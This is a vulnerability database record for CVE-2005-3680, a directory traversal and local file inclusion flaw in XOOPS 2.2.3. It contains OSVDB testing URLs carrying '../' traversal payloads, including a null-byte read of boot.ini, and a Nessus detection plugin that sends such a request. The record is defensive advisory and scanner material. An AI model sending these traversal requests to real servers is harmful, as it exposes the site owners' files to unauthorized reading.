ID CVE-2005-3680 Type cve Reporter NVD Modified 2016-10-17T23:36:48
Description
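Directory traversal vulnerability in editor_registry.php in XOOPS 2.2.3 allows remote attackers to read or include arbitrary local files via a .. (dot dot) in the xoopsConfig[language] parameter. According to the related OSVDB and Nessus entries below, the flaw affects the editor_registry.php script of the textarea, koivi and dhtmltextarea editors under class/xoopseditor/, and exploitation requires PHP's register_globals setting to be enabled and possibly magic_quotes_gpc to be disabled; the Nessus plugin's stated solution is to disable register_globals and enable magic_quotes_gpc.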
{"osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script\nhttp://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00\n## References:\nVendor URL: http://www.xoops.org/\n[Secunia Advisory ID:17573](https://secuniaresearch.flexerasoftware.com/advisories/17573/)\n[Related OSVDB ID: 20854](https://vulners.com/osvdb/OSVDB:20854)\n[Related OSVDB ID: 20855](https://vulners.com/osvdb/OSVDB:20855)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0152.html\nFrSIRT Advisory: ADV-2005-2428\n[CVE-2005-3680](https://vulners.com/cve/CVE-2005-3680)\nBugtraq ID: 15406\n", "modified": "2005-11-12T09:18:28", "published": "2005-11-12T09:18:28", "href": "https://vulners.com/osvdb/OSVDB:20853", "id": "OSVDB:20853", "type": "osvdb", "title": "XOOPS textarea/editor_registry.php xoopsConfig[language] Variable Traversal Arbitrary File Access", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script\nhttp://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00\n## References:\nVendor URL: http://www.xoops.org/\n[Secunia Advisory ID:17573](https://secuniaresearch.flexerasoftware.com/advisories/17573/)\n[Related OSVDB ID: 20853](https://vulners.com/osvdb/OSVDB:20853)\n[Related OSVDB ID: 20855](https://vulners.com/osvdb/OSVDB:20855)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0152.html\nFrSIRT Advisory: 
ADV-2005-2428\n[CVE-2005-3680](https://vulners.com/cve/CVE-2005-3680)\nBugtraq ID: 15406\n", "modified": "2005-11-12T09:18:28", "published": "2005-11-12T09:18:28", "href": "https://vulners.com/osvdb/OSVDB:20854", "id": "OSVDB:20854", "type": "osvdb", "title": "XOOPS koivi/editor_registry.php xoopsConfig[language] Variable Traversal Arbitrary File Access", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script\nhttp://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00\n## References:\nVendor URL: http://www.xoops.org/\n[Secunia Advisory ID:17573](https://secuniaresearch.flexerasoftware.com/advisories/17573/)\n[Related OSVDB ID: 20853](https://vulners.com/osvdb/OSVDB:20853)\n[Related OSVDB ID: 20854](https://vulners.com/osvdb/OSVDB:20854)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0152.html\nFrSIRT Advisory: ADV-2005-2428\n[CVE-2005-3680](https://vulners.com/cve/CVE-2005-3680)\nBugtraq ID: 15406\n", "modified": "2005-11-12T09:18:28", "published": "2005-11-12T09:18:28", "href": "https://vulners.com/osvdb/OSVDB:20855", "id": "OSVDB:20855", "type": "osvdb", "title": "XOOPS dhtmltextarea/editor_registry.php xoopsConfig[language] Variable Traversal Arbitrary File Access", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:51", "bulletinFamily": "scanner", "description": "The remote installation of XOOPS fails to sanitize user-supplied input to the 'xoopsConfig[language]' parameter of several xoopseditor scripts before using it in PHP 'include' functions. 
An unauthenticated attacker may be able to leverage these issues to read arbitrary local files and even execute arbitrary PHP code, subject to the privileges of the web server user id. Successful exploitation requires that PHP's 'register_globals' setting be enabled and possibly that 'magic_quotes_gpc' be disabled.", "modified": "2018-08-07T00:00:00", "id": "XOOPS_XOOPSCONFIG_FILE_INCLUDES.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20213", "published": "2005-11-16T00:00:00", "title": "XOOPS xoopsConfig[language] Parameter Local File Inclusion (XOOPS_WFd205_xpl)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20213);\n script_version(\"1.18\");\n\n script_cve_id(\"CVE-2005-3680\");\n script_bugtraq_id(15406);\n\n script_name(english:\"XOOPS xoopsConfig[language] Parameter Local File Inclusion (XOOPS_WFd205_xpl)\");\n script_summary(english:\"Checks for xoopsConfig parameter local file inclusion vulnerabilities in XOOPS\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple local file inclusion issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote installation of XOOPS fails to sanitize user-supplied input\nto the 'xoopsConfig[language]' parameter of several xoopseditor\nscripts before using it in PHP 'include' functions. An\nunauthenticated attacker may be able to leverage these issues to read\narbitrary local files and even execute arbitrary PHP code, subject to\nthe privileges of the web server user id. 
Successful exploitation\nrequires that PHP's 'register_globals' setting be enabled and possibly\nthat 'magic_quotes_gpc' be disabled.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://retrogod.altervista.org/xoops_xpl.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting and enable its\n'magic_quotes_gpc' setting.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/11/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/12\");\n script_cvs_date(\"Date: 2018/08/07 16:46:49\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:xoops:xoops\");\nscript_end_attributes();\n\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n \n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"xoops_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/xoops\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/xoops\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n #\n # nb: header.php in XOOP's main directory is useful because it should\n # always be 
present, returns a message if called directly, and its\n # use doesn't depend on magic_quotes_gpc.\n file = \"../../../../header\";\n if (thorough_tests) editors = make_list(\"dhtmltextarea\", \"koivi\", \"textarea\");\n else editors = make_list(\"textarea\");\n\n foreach editor (editors) {\n r = http_send_recv3(method:\"GET\", port:port,\n item:string(\n dir, \"/class/xoopseditor/\", editor, \"/editor_registry.php?\",\n \"xoopsConfig[language]=\", file\n ));\n if (isnull(r)) exit(0);\n\n # There's a problem if we get a message about \"root path\".\n if (\"XOOPS root path not defined\" >< r[2]) {\n security_warning(port);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}